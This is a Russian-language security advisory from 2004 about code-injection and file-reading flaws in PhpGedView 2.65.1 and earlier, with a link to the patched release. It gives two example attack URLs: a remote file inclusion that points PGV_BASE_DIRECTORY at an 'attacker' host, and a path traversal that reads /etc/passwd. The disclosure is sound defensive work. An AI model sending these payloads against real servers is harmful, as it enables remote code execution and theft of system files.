Security Lab

Множественные уязвимости в PhpGedView

Дата публикации:01.02.2004
Дата изменения:17.10.2006
Всего просмотров:1111
Опасность:
Высокая
Наличие исправления: Да
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации: Удаленная
Воздействие: Компрометация системы
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: PhpGedView 2.x
Уязвимые версии: PhpGedView 2.65.1 и более ранние версии

Описание: Несколько уязвимостей обнаружено в PhpGedView. Удаленный пользователь может выполнить произвольный PHP код и команды операционной системы на целеовой системы. Удаленный авторизованный пользователь с ”admin“ привилегиями может просматривать произвольные файлы на целевой системе.

Несколько сценариев (заканчивающихся '_conf.php') не проверяют данные, представленные пользователем в переменной $PGV_BASE_DIRECTORY. Пример:

http://[target]/[phpGedView-directory ]/index/[GED_File]_conf.php?PGV_BASE_DIRECTORY=http://attacker&THEME_DIR=/
Удаленный авторизованный пользователь с ”admin“ привилегиями может просматривать произвольные файлы на целевой системе. Пример:
http://[target]/[phpGedView-directory]/editconfig_gedcom.php?gedcom_config=../../../../../../etc/passwd

URL производителя: http://phpgedview.sourceforge.net/

Решение:Установите обновленную версию программы: http://sourceforge.net/project/showfiles.php?group_id=55456&package_id=61562&release_id=141517

Ссылки: PHP Code Injection Vulnerabilities in phpGedView 2.65.1 and prior